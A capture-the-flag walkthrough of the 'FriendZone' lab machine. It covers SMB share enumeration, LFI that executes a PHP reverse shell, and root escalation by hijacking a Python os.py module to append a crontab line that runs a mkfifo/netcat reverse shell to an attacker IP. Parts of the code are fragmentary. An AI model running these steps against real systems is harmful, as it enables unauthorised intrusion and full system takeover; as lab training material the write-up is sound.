Again, we start with nmap -sC -sV -oA ./friendzone 10.10.10.123
SMB, DNS, HTTP and HTTPS. Let's start with web services and SMB. A quick smbclient -L 10.10.10.123 show us a few shares
smbclient -L 10.10.10.123
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
One interesting note is the Comment section on the Files share. It shows the actual location which is CVE-2000-0649. The actual location is /etc/Files. The web service on HTTP show us a static page and HTTPS shows not found
Let's try connecting to the SMB shares and see what's available. We can connect to the general share and we find a creds.txt file there.
smbclient -N \\\\10.10.10.123\\general
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6458412 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
kali@kali:~/Friendzone$ cat creds.txt
creds for the admin THING:
We can't connect to Files and Development is empty.
That's everything we can do with SMB right now. Let's try DNS. The start page has an email address at friendzone.red so let's try zone transferring it for more info.
Let's add friendzone.red to our HOSTS file and see if we can get to an HTTPS page.
After accepting the self-signed certificate, we have an HTTPS page! Getting warmer. Let's check the other sub-domains of uploads, hr, and administrator1. We can access uploads and administrator1, but HR fails with not found. On the administrator1.friendzone.red page, let's try the creds we found on the general share. We can log in and it tells us to visit dashboard.php.
If I'm following the logic correctly, we upload files in the Uploads page and can access it from the Administrator1 page. The dashboard even gives us the handy identifiers of image_id and pagename. I tried uploading php shell pages, but they all failed. I wonder if we can manipulate one of those parameters to get a local file inclusion (LFI). Let's try it. Using smbclient -N \\\\10.10.10.123\\Development we try putting the PHP-reverse-shell from Pentest Monkey
http://pentestmonkey.net/tools/web-shells/php-reverse-shell onto the Development share. Now to figure out how to execute it. We know that Files is /etc/Files. It stands to reason that Development is actually /etc/Development. So, we would likely need to execute /etc/Development/phprs.php (I shortened the name for easier typeout). Start a netcat listener and then see if that path is accessible in the pagename parameter.
Excellent! www-data shell. Move LinEnum.sh over to the target (either through python3 http.service or using SMB to Development and then moving it to /tmp). The results are in the CherryTree file. Digging through the output, I don't see anything that jumps out so let's check running processes with pspy. After a few minutes, we see a cron job running reporter.py as root. Let's check that out.
to_address = "email@example.com"
from_address = "firstname.lastname@example.org"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to email@example.com -from firstname.lastname@example.org -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
# I need to edit the script later
# Sam ~ python developer
Looks like it just sends a mail message. Nothing useful on its own, but if we combine it with lines 150 and 1338 of the LinEnum output, we see that we can modify os.py that this script calls on. Let's use that to hijack crontab. Create an os.py on your machine with this code, and then SMB put the new file into /etc/Development on the Target
shell = '''
* * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1| nc 10.10.XX.XX 9991 > /tmp/f
f = open('/etc/crontab','a')
Now we copy our os.py over to /usr/lib/Python2.7/os.py, start a netcat listener, and wait for the fireworks. Kaboom. Root shell.